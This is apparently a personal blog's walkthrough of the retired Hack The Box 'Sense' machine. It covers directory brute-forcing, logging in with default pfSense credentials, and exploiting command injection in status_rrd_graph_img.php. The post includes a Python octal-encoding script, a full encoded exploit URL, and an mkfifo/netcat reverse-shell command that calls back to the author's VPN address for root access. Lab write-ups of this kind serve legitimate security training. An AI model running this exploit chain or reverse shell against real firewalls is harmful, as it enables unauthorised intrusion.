Skip to main content

Hackthebox.eu - Sense - Retired - Updated



Recon


I've been using threader3000 for my recon scan on HTB. It does a staged scan, first it does a super quick up/down scan on all TCP ports then it takes the results of that scan and pipes it into a nmap scan. It automatically saves the results of the nmap scan as XML, which I then convert to HTML to make it pretty.




xsltproc ./10.10.10.60/10.10.10.60.xml -o ./sense.html





Just two ports open 80 & 443. It looks like 80 is lighttpd 1.4.35


When I try to browse using the dns name I added in my /etc/hosts


I get this message.



Weird.


First it redirects me to HTTPS, then I get this error message


If I try it by ip address.




We get redirected to https again and this time we get a login page for pfsense.

Which is an open source firewall project.






https://www.pfsense.org/


A quick google search shows the default credentials for this should be


Username: admin

Password: pfsense


But that doesn't work.


Not much to go on now, let's see if there is anything else that might be on the web server by attempting to brute force for other directories and files, using dirb




Dirb found us some new directories, but not much to go forward with


So we still don't have much of anything to go on, let's try scanning with another tool and a different list to see if we can get some different responses. It's always a good idea to try multiple tools, and multiple lists.


This time I used Dirbuster and the list,

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 


I added txt,html,conf,bak,sh to my search options to look for different file types too


And with the different list we did see a couple of new files 



Changelog.txt and system-users.txt


Let's see what the changelog.txt has in it.


https://10.10.10.60/changelog.txt



# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window


2 of 3 vulnerabilities have been patched, well that means there is one that hasn't right? Good news for us.


What about systems-user.txt


https://10.10.10.60/system-users.txt



####Support ticket###

Please create the following user


username: Rohit
password: company defaults



Ok looks like a ticket asking for an account named rohit to be created with the company default password….. 


Now does that mean the company's Sense.htb's default password or the default password for the company that made the software?


We would have no idea what the internal default password for the Sense company might be, we did already find the default password setup by pfsense


Password: pfsense


Let's try logging in with


Username: rohit

Password: pfsense



It worked, lets see if we can figure out a ware to get code execution from this panel somewhere.





Exploit



It took me a while to find a non-metasploit path forward here.


I eventually came across a couple of blogs.


https://spencerdodd.github.io/2018/01/14/pfsense-arbitrary-code-execution/


The first is showing that the rrd graph is vulnerable to RCE because during the sanitation of the user input they neglected to strip out the "|" character which we can use to pipe other commands to. They also said that if you octal encode your payload you can also bypass the sanitaion all together. 


So combining these we can use the pipe to get another execution of a command and if we octal encode our command we can then issue any command we want to.


I then found this site with a POC in python


https://vulners.com/packetstorm/PACKETSTORM:145909


I had trouble getting  the POC to work but I did borrow from its code to create a little encoding python script for me to use.


I

import sys
stager = sys.argv[1]
encoded = ""

print(sys.argv[1])
for c in stager:
 encoded += ("\\" + oct(ord(c)).lstrip("0o"))


exploit_url = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + encoded + "'|sh" 
print(exploit_url)



Which will accept an argument from the command line and octal encode it, then reinsert it into what the finally URL call would be.


I wanted to start with a bit of a POC of my own. I just want to see if I can have sense ping back to my computer.


So first let's start up tcpdump to listen for ICMP on my VPN tunnel interface


sudo tcpdump -i tun0 -n icmp


Then with my little encoder script I named encoder.py


I encoded "Ping -c 4 10.10.14.10"


python3 ./encoder.py "ping -c 4 10.10.14.10"


Which gave me the following output.





ping -c 4 10.10.14.10
https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh



I copied that link into firefox and…..





We got ping back


So we have been able to use the RCE on pfense


So let's try netcat now to get a reverse shell.


First let's set up our listener.

nc -lnvp 5555


Had trouble getting nc to work, I couldn't get a reverse shell back. I'm guessing at this point that nc is restricted somehow or a non-compatible version.


I tried a bunch of different interaction of a reverse shell and finally found one that worked on 

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp



Netcat OpenBsd

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f


So first thing is I modified it to be my VPN IP and port


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



So I piped that though the little encode.py


python3 ./encoder.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



And I got this back as the encoded URL


https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\162\155\40\57\164\155\160\57\146\73\155\153\146\151\146\157\40\57\164\155\160\57\146\73\143\141\164\40\57\164\155\160\57\146\174\57\142\151\156\57\163\150\40\55\151\40\62\76\46\61\174\156\143\40\61\60\56\61\60\56\61\64\56\61\60\40\65\65\65\65\40\76\57\164\155\160\57\146'|sh


And once that was pasted back into firefox



We got our shell as root.


Let's grab those flags and call it a day.





And just for grins and giggles I checked on the nc reverse shell I had problems with in the begining and saw this.


This version of netcat doesn't allow you to pipe to an executable using -e


Unlike most versions of netcat.





Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...
Post a Comment
Read more

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...
Post a Comment
Read more

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor
Post a Comment
Read more